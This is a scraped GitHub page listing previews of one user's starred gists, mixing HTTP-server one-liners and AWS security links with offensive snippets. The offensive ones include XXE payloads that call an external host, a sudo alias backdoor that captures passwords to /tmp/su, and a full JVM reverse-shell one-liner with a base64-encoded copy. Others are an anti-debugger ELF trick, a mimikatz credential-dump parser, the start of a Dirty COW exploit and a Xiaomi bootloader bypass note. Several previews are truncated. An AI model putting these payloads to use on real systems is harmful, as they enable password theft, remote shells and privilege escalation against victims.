Skip to content

Instantly share code, notes, and snippets.

View lifa123's full-sized avatar
💭
I may be slow to respond.

muuk lifa123

💭
I may be slow to respond.
924 followers · 16.7k following
  • china
View GitHub Profile
@willurd
willurd / web-servers.md
Last active April 20, 2025 00:42
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@dergachev
dergachev / simple-https-server.py
Created October 17, 2013 17:07
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@chanj
chanj / AWS Security Resources
Last active June 21, 2021 09:49
AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
@staaldraad
staaldraad / XXE_payloads
Last active March 31, 2025 07:19
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@ahhh
ahhh / sudo_alias.sh
Last active May 26, 2021 05:48
sudo alias backdoor for stealing passwords
alias sudo='echo -n "[sudo] password for $USER: " && read -r password && echo "$password" >/tmp/su && /usr/bin/sudo $@'
@crowell
crowell / killgdb.c
Last active March 21, 2020 09:17
#include <elf.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
// killgdb.c - prevent an elf from being loaded by gdb.
// Jeffrey Crowell <crowell [at] bu [dot] edu>
//
// $ objcopy --only-keep-debug program program.debug
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active December 13, 2023 15:02
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@Raikia
Raikia / One-liner Mimikatz Parser
Last active October 1, 2020 01:37
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
@mak
mak / naughtyc0w.c
Created October 22, 2016 20:48
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>
anonymous
anonymous / xiaomi-locked-bootloader.md
Created January 6, 2017 00:06
Xiaomi's locked bootloader is insecure and useless

Xiaomi's locked bootloader is insecure and useless

Your phone should have a locked bootloader, as it ensures the integrity of the software running on the device. This is especially relevant for Xiaomi phones, which are often loaded with all sorts of crapware by shady merchants. These vendor ROM's are a serious security risk. You really don't want to run that shit, so do your research very carefully when importing a Xiaomi device to ensure it hasn't been tampered with.

So, Xiaomi makes these nice phones and those vendors just ruin it all. They do the logical thing and start locking devices. But even today, vendor ROM's are still a thing! Even the brand new edgeless Mi Mix isn't safe.

How is this possible?

Through a wide open back door called EDL mode. To flash anything you want, all you need is a "deep flash cable" from [Aliexpress](https://www.aliexpress.com/wholesale?catId=0&amp;SearchText=xiaomi+deep+fl